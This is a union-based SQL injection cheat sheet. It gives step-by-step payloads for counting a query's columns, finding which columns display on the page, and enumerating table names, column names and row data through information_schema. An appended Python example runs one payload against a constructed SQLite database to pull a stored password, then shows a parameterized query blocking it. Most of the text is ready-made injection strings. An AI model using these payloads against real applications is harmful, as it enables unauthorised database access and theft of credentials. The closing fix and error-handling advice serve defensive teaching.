Union-Based SQLi – Long Method

Enumerate Number of Columns

Method 1

Enumerate column 1
1 order by 1
Enumerate column 2
1 order by 2

Continue incrementing the order by value until the database returns an error; the last value that worked is the number of columns in the original query.

Method 2

Enumerate column 1
' order by 1-- -
Enumerate column 2
' order by 2-- -

Continue incrementing the order by value until the database returns an error; the last value that worked is the number of columns in the original query.

Method 3

Enumerate column 1
' UNION SELECT NULL--
Enumerate column 2
' UNION SELECT NULL,NULL--

Continue adding NULL placeholders until the query stops returning an error; the number of NULLs at that point is the number of columns.

Method 4

Enumerate column 1
<Legit Search>' order by 1-- -
Enumerate column 2
<Legit Search>' order by 1,2-- -

Continue adjusting the order by clause until no results are returned.

Find Where Information Appears on the Screen

With the column count known (four in the examples below), inject a UNION SELECT with that many numbered placeholders; the numbers that are rendered in the page identify the columns whose output is displayed. In the number injection, the 1=2 condition makes the original row match nothing so only the UNION row is shown.

Number injection
1 and 1=2 UNION SELECT 1,2,3,4-- -
String injection
' UNION SELECT 1,2,3,4-- -

Enumerate Table Names

The number of placeholders in each UNION SELECT must equal the column count found above; the examples below show both a four-column and a two-column target.

Enumerate table_1

Method 1
1 and 1=2 UNION SELECT 1,2,3,table_name from information_schema.tables--
Method 2
' UNION SELECT table_name,2 from information_schema.tables--

Enumerate table_2
' UNION SELECT 1,2,3,table_name from information_schema.tables where table_name not in ('<table_1>')--

Enumerate table_3
' UNION SELECT 1,2,3,table_name from information_schema.tables where table_name not in ('<table_1>','<table_2>')--

Enumerate Column Names

Enumerate column_1 for table_1
' UNION SELECT column_name,2 from information_schema.columns where table_name='<table_1>'--

Enumerate column_2 for table_1
' UNION SELECT 1,2,3,column_name from information_schema.columns where table_name='<table_1>' and column_name not in ('<column_1>')--

Enumerate Data

Enumerate data_1 from column_1 of table_1
' UNION SELECT 1,2,3,<column_1> from <table_1>--

Enumerate data_2 from column_1 of table_1
' UNION SELECT 1,2,3,<column_1> from <table_1> where <column_1> not in ('<data_1>')--
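The following is an added example, not part of the original cheat sheet, that ties the column-count probing and the data-extraction payload above to the root cause and its fix. It builds a constructed SQLite schema (products with four columns, a users table standing in for <table_1>/<column_1>), runs the page's probes through a query that splices user input into SQL text, and runs the same input through a parameterized query to show that the bound value can no longer change the statement.

```python
import sqlite3

# Constructed schema: a product search that selects four columns, plus a
# users table holding the data a UNION would expose. Not from the page.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL, descr TEXT);
        INSERT INTO products VALUES (1, 'widget', 9.99, 'a widget');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'hunter2');
    """)
    return conn

def search_vulnerable(conn, term: str) -> list:
    # The term is spliced into the SQL text, so a quote closes the string
    # literal and the rest of the input is parsed as SQL.
    sql = f"SELECT id, name, price, descr FROM products WHERE name = '{term}'"
    return conn.execute(sql).fetchall()

def search_parameterized(conn, term: str) -> list:
    # The term travels as a bound value; it can only ever be compared
    # against name and cannot change the statement's structure.
    sql = "SELECT id, name, price, descr FROM products WHERE name = ?"
    return conn.execute(sql, (term,)).fetchall()

# The page's probes, with <table_1>/<column_1> filled in for this schema.
WRONG_WIDTH = "' UNION SELECT NULL--"                   # 1 placeholder vs 4
EXTRACT = "' UNION SELECT 1,2,3,password FROM users--"  # 4 placeholders

def column_count_error(conn) -> str:
    """Error text the vulnerable query leaks when the UNION width is wrong."""
    try:
        search_vulnerable(conn, WRONG_WIDTH)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return ""

def demo() -> dict:
    conn = make_db()
    out = {
        "width_error": column_count_error(conn),    # verbose DB error leaks
        "vulnerable": search_vulnerable(conn, EXTRACT),  # users row returned
        "parameterized": search_parameterized(conn, EXTRACT),  # nothing
    }
    conn.close()
    return out

if __name__ == "__main__":
    print(demo())
```

The leaked error string is what the "until an error is returned" steps rely on, so beyond parameterizing queries, applications should return a generic error to the client and keep the database message in server-side logs.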